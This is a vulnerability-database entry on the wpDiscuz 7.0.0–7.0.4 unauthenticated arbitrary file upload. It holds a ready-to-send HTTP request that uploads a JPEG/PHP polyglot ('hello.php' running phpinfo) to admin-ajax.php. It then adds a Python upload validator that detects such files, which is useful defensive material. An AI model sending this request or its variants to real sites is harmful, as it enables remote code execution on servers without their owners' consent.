Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload

2020-07-28T00:00:00
ID WPEX-ID:92AE2765-DAC8-49DC-A361-99C799573E61
Type wpexploit
Reporter Chloe Chamberland
Modified 2020-08-25T05:00:07

Description

This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.

                                        
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: URL
Content-Length: 774
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGWBOKSwsalnzhha
Origin: http://URL
Referer: http://URL
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 
Connection: close

------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="action"

wmuUploadFiles
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="wmu_nonce"

aede3ab0b2
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="wmuAttachmentsData"

undefined
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="wmu_files[0]"; filename="hello.php"
Content-Type: image/jpeg

ÿØÿájExifMM*‡i>¨À’ÿàJFIFÿÛC

<?php phpinfo();?>
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="postId"

393
------WebKitFormBoundaryUGWBOKSwsalnzhha--
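
The request above pairs a `.php` filename with JPEG header bytes and an `image/jpeg` content type. The following is an added example, not code from wpDiscuz or from the original report: a server-side upload check that rejects that combination, shown next to a content-only check that accepts it. The function names, the extension allowlist and the sample byte strings are assumptions constructed for illustration.

```python
import os

# Assumed allowlist for an image-attachment feature: extension -> valid signatures.
ALLOWED_IMAGES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def sniff_only_check(data: bytes) -> bool:
    """Content-only check, for contrast: trusts leading bytes, ignores the name."""
    return any(data.startswith(sigs) for sigs in ALLOWED_IMAGES.values())


def inspect_upload(filename: str, data: bytes) -> list[str]:
    """Return the reasons an upload should be rejected (empty list = accept)."""
    reasons = []
    # Judge only the final path component and its final extension, lower-cased.
    name = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(name)[1].lower()
    sigs = ALLOWED_IMAGES.get(ext)
    if sigs is None:
        # Primary control: the stored name decides whether the server runs the file.
        reasons.append(f"extension {ext or '(none)'} not in image allowlist")
    elif not data.startswith(sigs):
        reasons.append(f"content does not start with a {ext} signature")
    # Heuristic signal only: a valid image header says nothing about the rest.
    if b"<?php" in data.lower():
        reasons.append("PHP open tag found in file body")
    return reasons


# Constructed samples modelled on the multipart part named wmu_files[0] above.
JPEG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
POLYGLOT = JPEG_HEAD + b"\n\n<?php phpinfo();?>"
CLEAN = JPEG_HEAD + b"\x00" * 32

if __name__ == "__main__":
    for fname, body in (("hello.php", POLYGLOT), ("photo.jpg", CLEAN)):
        print(fname, "| sniff-only accepts:", sniff_only_check(body),
              "| reject reasons:", inspect_upload(fname, body))
```

The same `inspect_upload` function can be run over files already present in an uploads directory to find earlier uploads of this kind.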